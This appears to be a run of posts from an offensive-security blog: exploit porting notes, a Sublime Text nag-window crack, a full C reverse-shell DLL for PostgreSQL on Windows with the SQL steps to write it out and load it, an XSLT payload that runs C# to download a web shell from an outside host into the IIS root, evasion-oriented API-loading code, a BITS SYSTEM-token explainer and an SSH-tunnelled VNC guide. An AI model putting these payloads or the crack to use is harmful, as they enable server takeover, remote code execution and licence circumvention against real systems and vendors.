    By changing the shellcode, we gained one enormous benefit. We no longer have to find the stack offset that contains a pointer to the third stage. This step gave us so much trouble that we started experimenting with using an egg hunter. We know that the stack offset to the third stage was a bottleneck for SilentSignal as well (Bake Your Own EXTRABACON). But once we understood the overall operation of all stages, we were happy to just reduce the bytes and keep everything in the one stage. Not having to find the third stage offset makes porting the exploit very simple.

    Future WorkΒ 

    The Equation Group appeared to have generated their shellcode. We have written a Python script that will auto-port the code to different versions. We find offsets using similar heuristics to what ROPGadget offers. Of course, you can't trust a tool 100% (in fact, some of the Equation Group shellcode crashes certain versions). So we are testing each version.

    We're also porting the Python code to Ruby, so the exploit will be part of Metasploit. Our Metasploit module will contain the new shellcode for all Shadow Broker versions, as well as offsets for numerous versions not part of the original release, so keep an eye out for it.

    Removing Sublime Text Nag Window

    I contemplated releasing this blog post earlier, and now that everyone has moved on from Sublime Text to Atom there's really no reason not to push it out. This is posted purely for educational purposes.

    Everyone who has used the free version of Sublime Text knows that when you go to save a file, it will randomly show a popup asking you to buy the software. This is known as a "nag window".



    The first time I saw it, I knew it had to be cracked. Just pop open the sublime_text.exe file in IDA Pro and search for the string.



    We find a match, and IDA tells us where it is cross referenced.



    We open the function that uses these .rdata bytes and see that it checks some globals, and performs a call to rand(). If any of the checks fail it will display the popup. The function itself is only about 20 lines of pretty basic assembly but we decompile it anyway because the screenshot is cooler that way.



    We open the hex view to see what the hex code for the start of the function looks like.



    Next we open sublime_text.exe in Hex Workshop and search for the hex string that matches the assembly.



    Finally, we patch the beginning of the function with the assembly opcode c3, which will cause the function to immediately return.



    After saving, there will be no more nag window. As an exercise to the reader, try to make Sublime think you have a registered copy.

    Windows DLL to Shell PostgreSQL Servers

    On Linux systems, you can include system() from the standard C library to easily shell a Postgres server. The mechanism for Windows is a bit more complicated.

    I have created a Postgres extension (Windows DLL) that you can load which contains a reverse shell. You will need file write permissions (i.e. postgres user). If the PostgreSQL port (5432) is open, try logging on as postgres with no password. The payload is in DllMain and will run even if the extension is not properly loaded. You can upgrade to meterpreter or other payloads from here.



    #define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1"
    #define PG_REVSHELL_CALLHOME_PORT "4444"

    #include "postgres.h"
    #include <string.h>
    #include "fmgr.h"
    #include "utils/geo_decls.h"
    #include <winsock2.h>

    #pragma comment(lib,"ws2_32")

    #ifdef PG_MODULE_MAGIC
    PG_MODULE_MAGIC;
    #endif

    #pragma warning(push)
    #pragma warning(disable: 4996)
    #define _WINSOCK_DEPRECATED_NO_WARNINGS

    BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL,
    _In_ DWORD fdwReason,
    _In_ LPVOID lpvReserved)
    {
    WSADATA wsaData;
    SOCKET wsock;
    struct sockaddr_in server;
    char ip_addr[16];
    STARTUPINFOA startupinfo;
    PROCESS_INFORMATION processinfo;

    char *program = "cmd.exe";
    const char *ip = PG_REVSHELL_CALLHOME_SERVER;
    u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    wsock = WSASocket(AF_INET, SOCK_STREAM,
    IPPROTO_TCP, NULL, 0, 0);

    struct hostent *host;
    host = gethostbyname(ip);
    strcpy_s(ip_addr, sizeof(ip_addr),
    inet_ntoa(*((struct in_addr *)host->h_addr)));

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr(ip_addr);

    WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server),
    NULL, NULL, NULL, NULL);

    memset(&startupinfo, 0, sizeof(startupinfo));
    startupinfo.cb = sizeof(startupinfo);
    startupinfo.dwFlags = STARTF_USESTDHANDLES;
    startupinfo.hStdInput = startupinfo.hStdOutput =
    startupinfo.hStdError = (HANDLE)wsock;

    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0,
    NULL, NULL, &startupinfo, &processinfo);

    return TRUE;
    }

    #pragma warning(pop) /* re-enable 4996 */

    /* Add a prototype marked PGDLLEXPORT */
    PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);

    PG_FUNCTION_INFO_V1(add_one);

    Datum dummy_function(PG_FUNCTION_ARGS)
    {
    int32 arg = PG_GETARG_INT32(0);

    PG_RETURN_INT32(arg + 1);
    }



    Here is the convoluted process of exploitation:
    postgres=# CREATE TABLE hextable (hex bytea);
    postgres=# CREATE TABLE lodump (lo OID);


    [email protected]:~/$ echo "INSERT INTO hextable (hex) VALUES
    (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt
    [email protected]:~/$ psql -U postgres --host=localhost --file=sql.txt


    postgres=# INSERT INTO lodump SELECT hex FROM hextable;
    postgres=# SELECT * FROM lodump;
    lo
    -------
    16409
    (1 row)
    postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll');
    postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS
    'C:\Program Files\PostgreSQL\9.5\binpg_revshell.dll', 'dummy_function' LANGUAGE C STRICT;

    XML Attack for C# Remote Code Execution

    For whatever reason, Microsoft decided XML needed to be Turing complete. They created an XSL schema which allows for C# code execution in order to fill in the value of an XML element.

    If an ASP.NET web application parses XML, it may be susceptible to this attack. If vulnerable, an attacker gains remote code execution on the web server. Crazy right? It is similar in exploitation as traditional XML Entity Expansion (XXE) attacks. Gaining direct code execution with traditional XXE requires extremely rare edge cases where certain protocols are supported by the server. This is more straight forward: supply whatever C# you want to run.

    The payload in this example XML document downloads a web shell into the IIS web root. Of course, you can craft a more sophisticated payload, or perhaps just download and run some malware (such as msfvenom/meterpreter). In many cases of a successful exploitation, and depending on the application code, the application may echo out the final string "Exploit Success" in the HTTP response.

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
    <msxsl:script language="C#" implements-prefix="user">
    <![CDATA[
    public string xml()
    {
    System.Net.WebClient webClient = new System.Net.WebClient();
    webClient.DownloadFile("https://x.x.x.x/shell.aspx",
    @"c:\inetpub\wwwroot\shell.aspx");

    return "Exploit Success";
    }
    ]]>
    </msxsl:script>
    <xsl:template match="/">
    <xsl:value-of select="user:xml()"/>
    </xsl:template>
    </xsl:stylesheet>

    Note: I've never gotten the "using" directive to work correctly, but have found the fully qualified namespaces of the classes (e.g. System.Net.WebClient) works fine.

    This is kind of a hidden gem, it was hard to find good information about this.

    Thanks to Martin Bajanik for finding this information: this attack is possible when XsltSettings.EnableScript is set to true, but it is false by default.

    LoadLibrary() and GetProcAddress() replacements for x86, x64, and ARM

    I was attempting to reduce the number of records in the Import Address Table of an executable, which of course meant a replacement for LoadLibrary() and GetProcAddress() were needed. I couldn't find a version online that worked for x86, x64, and ARM; so I ended up writing one. Even being mostly familiar with the PE format and Windows internals in general, there were a few caveats that led to an annoying debug session (such as forward exports).

    Here is a working replacement for the two APIs. You can even define the PE header and PEB structs in your own header and lose the requirement for the default Windows headers. I also recommend a crypter for the strings you pass to these functions.

    https://github.com/zerosum0x0/LoadLibrary-GetProcAddress-Replacements/blob/master/load/main.c

    Note: This will internally rely on Kernel32.dll being loaded, and will calculate the real location of LoadLibrary() dynamically. New DLLs will be mapped in with the real API call, this does not code does not do manual mapping or calling of DllMain. I recommend using it to get the real addresses of LoadLibrary() and GetProcAddress() and then doing all calls through the real APIs.

    BITS Manipulation: Stealing SYSTEM Tokens as a Normal User

    The Background Intelligent Transfer Service (BITS) is a Windows system service that facilitates file transfers between clients and servers, and serves as a backbone component for Windows Update. The service comes pre-installed on all modern versions of Windows, and is available in versions as early as Windows 2000 with service pack updates. There are ways for a non-Administrator user to manipulate the service into providing an Identification Token with the LUID of 999 (0x3e7), or the NT AUTHORITY\SYSTEM (Local System) root-equivalent user.


    BITS Manipulation is a pre-stage to modern privilege escalation attacks.

    BITS Manipulation is not a full exploit per se, but rather a pre-stage to local (and possibly remote) privilege escalation with a crafted executable. Identification Tokens can only lead to arbitrary code execution in the prescence of secondary Improper Access Control (CWE-284) vulnerabilities. Google's Project Zero has proved a number of full exploits using the technique. There are currently no known plans for Microsoft to fix this. Details for performing it and why it works remain exceptionally scarce.

    Windows Tokens

    Every user-mode thread on Windows executes with a Token, which is used as its security identifier by the kernel in order to determine access rights during system calls. When a user starts a process, the Primary Token for that process becomes one which represents the access rights of that user. Individual threads within the process are allowed to change their security context from the Primary Token through the use of Impersonation Tokens, which come in different privilege levels and can allow code execution in the context of a different user.

    Impersonation tokens are used throughout Windows in order to delegate responsibilities between users and the OS default users such as Local System, Local Service, and Network Service. For instance, a server process running as Network Service can impersonate a client user and perform actions on that user's behalf. It is extremely common and not suspicious behavior for a process to have multiple tokens open at any given time.

    Token Impersonation Levels

    A normal user obtaining an Identification Token as Local System is not necessarily an exploit in and of itself (some would argue, but at least not in the eyes of Microsoft). To understand why, a review of Token Impersonation Levels is required.

    BITS Manipulation and similar techniques only provide a SecurityIdentification Token for SYSTEM. This is useful for a number of tasks, but it still does not allow arbitrary code execution in the context of that user. Ordinarily, in order to achieve code execution as SYSTEM, the Token would need to be an Impersonation Token with the SecurityImpersonation or SecurityDelegation privilege.

    Identification-Only Exploitation

    There are a number of vulnerabilities in Windows where the Impersonation Level is not properly validated, such as in MS15-001, MS15-015, and MS15-050. These vulnerabilities failed to check if the Token Impersonation Level was sufficiently privileged before allowing arbitrary code execution in the context of the user.

    Here is a (simplified) reverse engineering of services.exe prior to the MS15-050 patch:


    Before MS15-050 Patch: The calling thread's Token is checked to see if it is run as SYSTEM, or LUID 999.

    With the background information above, the bug is easy to spot. Here is the same code after the patch:


    After MS15-050 Patch: The Impersonation Level is now correctly verified before the SYSTEM check.

    It should now be apparent why a normal user attempting to escalate privileges would want a SYSTEM Token, even if it is only of the SecurityIdentification privilege. There are countless token access control vulnerabilities already discovered, and more likely to be found.

    BITS Manipulation Methodology

    BITS, by default, is an automatically started Windows service which logs on as Local System. While the service is primarily used for uploading and downloading files between machines, it is also possible to create a BITS server which services the local machine context. When a download is queued, the BITS service connects to the server as the SYSTEM user.


    Forcing a BITS download to an attacker-controlled BITS server allows capture of a SYSTEM token.

    Here is the general methodology, which can be performed as a non-Administrator user on the machine:

    1. Create a BITS server with a local context.
    2. Launch a BITS download job, causing SYSTEM to start a client to the local BITS server.
    3. Capture SYSTEM's token when it interacts with the server.

    BITS Manipulation Implementation

    BITS is served on top of Microsoft's Component Object Model (COM). COM is a topic of extensive study, but it is essentially a language-neutral object-oriented binary-interface which is an arguable precursor to .NET. Remnants of COM objects are found in various areas throughout the system, including inter-process (and inter-network) communications with network and local services. BITS Manipulation is fairly straightforward to implement for a software engineer familiar with the aforementioned methodology, BITS documentation, and experience using COM.

    There is an already-written implementation that is available in Metasploit under exploit/windows/local/ntapphelpcachecontrol (MS15-001). The C++ source code offers a simple drop-in implementation for future proof-of-concepts, uncredited but likely written by James Forshaw of Google's Project Zero.

    Setting Up a Remote Desktop Behind Firewall

    Scenario: You are at a client site, and want to be able to securely check on pentest scans from your hotel room.

    There are three computers in this setup, which takes about 5 minutes.
    1. The laptop on the client network (the VNC server)
    2. The laptop you want to connect to the remote desktop with (the VNC client)
    3. A flagpole server (Internet-facing SSH server)

    Localhost port forwards managed by the Flagpole server sets up a secure tunnel between the machines.


    No new ports will be externally exposed on any of the machines, and all network traffic will be encrypted through SSH. This method is preferable to other remote desktop solutions such as TeamViewer, where essentially the Flagpole server is controlled by a third party. For extra security, you can run your Flagpole SSH daemon on a high port and enforce certificate-based authentication.

    This guide is for Linux, but the general methodology is probably possible on Windows using TigerVNC and PuTTY.

    Step 1: Bind VNC Server to the Flagpole

    On the VNC server machine (scanner laptop), issue the following commands:
    tmux new
    x11vnc -localhost [-forever]
    <ctrl+b, c>
    ssh -R XXXXX:localhost:5900 [email protected]

    Replace XXXXX with an unused port on Flagpole. Note that it is also possible to set a password for the x11vnc server. x11vnc defaults to port 5900, but can be changed with i.e. x11vnc -rfbport ###. This port is now forwarded by the port you assigned on the Flagpole.

    Step 2: Bind Flagpole to VNC Client

    On the VNC client (from your hotel room)

    tmux new
    ssh -L 5900:localhost:XXXXX [email protected]

    Where XXXXX is the port you bound on Flagpole. This forwards port 5900 on your local machine to the port you assigned on Flagpole.

    Step 3: Connect VNC Client to VNC Server

    Now, open your VNC software (vinagre/vncviewer/etc.) and connect to localhost:5900
    ❌